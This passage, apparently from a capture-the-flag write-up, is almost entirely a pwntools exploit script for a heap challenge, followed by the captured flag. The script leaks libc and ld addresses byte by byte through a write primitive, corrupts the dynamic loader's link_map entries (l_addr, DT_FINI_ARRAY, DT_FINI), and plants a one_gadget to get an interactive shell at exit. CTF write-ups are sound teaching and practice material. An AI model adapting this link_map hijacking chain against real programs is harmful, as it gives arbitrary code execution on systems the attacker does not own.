curr_heap_offset += 0x2
print(f'{hex(curr_heap_offset) = }')
clap(curr_heap_offset, curr_heap_offset)
print(f'Top chunk overwritten to 0x551...')

# Trigger malloc in scanf, so that we will have unsorted bin
# in the heap, and leak the libc address.
clap_str('500', '0'*0x500+'500')
print(f'Get unsorted bin to heap...')
curr_heap_offset += 0x6 + 0x8
leaked_libc=0
for i in range(6):
  clap(curr_heap_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_libc = leaked_libc | ( u8(r.recv(1)) << (i*8) )
  clap(curr_heap_offset+i,0x96) # restore original value
info(f'{hex(leaked_libc) = }')
libc_base = leaked_libc - (0x21ac80+96)
info(f'{hex(libc_base) = }')
info(f'{hex(pie_leak) = }')
one_gadget = (libc_base+0xebc85)

# Leak dl_resolve to calculate ld_base and link_map address
base_offset = pie_leak+0x18
dl_resolve_got = libc_base+0x21a010
dl_offset = dl_resolve_got - base_offset
leaked_ld = 0
for i in range(6):
  clap(dl_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_ld = leaked_ld | ( u8(r.recv(1)) << (i*8) )
  clap(dl_offset+i,0x96)
info(f'{hex(leaked_ld) = }')
ld_base = leaked_ld - 0x15d30
info(f'{hex(ld_base) = }')
link_map = ld_base + 0x3b2e0
info(f'{hex(link_map) = }')

# Nullify link_map->l_addr
l_addr_offset = link_map - base_offset
for i in range(6):
    clap(l_addr_offset+i, l_addr_offset+i)
print("nullify l_addr")

# Nullify link_map->l_info[DT_FINI_ARRAY]
dt_fini_array_offset = link_map+0x0110 - base_offset
for i in range(6):
    clap(dt_fini_array_offset+i, dt_fini_array_offset+i)
print("nullify dt_fini")

# Overwrite link_map->l_info[DT_FINI] with l_name
# We will use the `l_name` stored address as our link_map->l_info[DT_FINI] value
l_name_offset = link_map+0x8 - base_offset
dt_fini_offset = link_map+0xa8 - base_offset
for i in range(0x8):
    clap(dt_fini_offset+i, dt_fini_offset+i)
for i in range(6):
  clap(l_name_offset+i,dt_fini_offset+i)
print("finish overwrite")

# Leak link_map->l_info[DT_FINI] value that just got overwritten
leaked_dt_fini = 0
dt_fini_offset = link_map+0xa8 - base_offset
for i in range(6):
  clap(dt_fini_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_dt_fini = leaked_dt_fini | ( u8(r.recv(1)) << (i*8) )
  clap(dt_fini_offset+i,0x96)
info(f'{hex(leaked_dt_fini) = }')

# Set one_gadget in link_map->l_info[DT_FINI]->d_un.d_ptr
target_offset = leaked_dt_fini+0x8 - base_offset
for i in range(0x8):
    clap(target_offset+i, target_offset+i)
## Set higher 3 bytes, taken from one of the values stored in libc rw area
from_offset = libc_base+0x21b518 - base_offset
for i in range(3, 6):
    clap(from_offset+i,target_offset+i)
print("partial")

## Set 1st byte
target_offset = leaked_dt_fini+0x8 - base_offset
clap(ld_base-0x15f8 - base_offset, target_offset)
print("1st byte")

## Set 2nd byte
target_offset = leaked_dt_fini+0x8+1 - base_offset
clap(ld_base+0x3b091 - base_offset, target_offset)
print("2nd byte")

## Search 3rd byte
print('searching last byte')
last = (one_gadget>>16) & 0xff
print(f'{hex(last) = }')
offset = ld_base+0x3a000
count = 0
correct_offset = 0
for key, _ in map_offset.items():
    clap(offset+key - base_offset, 0x96)
    r.recvuntil('soul!',drop=True)
    temp = r.recvuntil(b'\x1b')
    if (temp[0] == 0x1b) and (len(temp)==1):
        val = 0
    else:
        val = temp[0]
    clap(offset+key - base_offset , 0x96)
    print('count = '+hex(count), f'{hex(key) = }, {hex(last) = }, {hex(val)}')
    if val == last:
        correct_offset = offset+key
        break
    count += 1

## Set 3rd byte
target_offset = leaked_dt_fini+0xa - base_offset
clap(correct_offset - base_offset, target_offset)
print("3rd byte")

# Just to validate that our write is success
target_offset = leaked_dt_fini+0x8 - base_offset
test_valzz = 0
for i in range(6):
    clap(target_offset+i, 0x96)
    r.recvuntil('soul!',drop=True)
    test_valzz = test_valzz | ( u8(r.recv(1)) << (i*8) )
    clap(target_offset+i,0x96)
info(f'{hex(one_gadget) = }')
info(f'{hex(test_valzz) = }')
clap(0, 0)

r.interactive()

Flag: dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}

Social Media

Follow me on twitter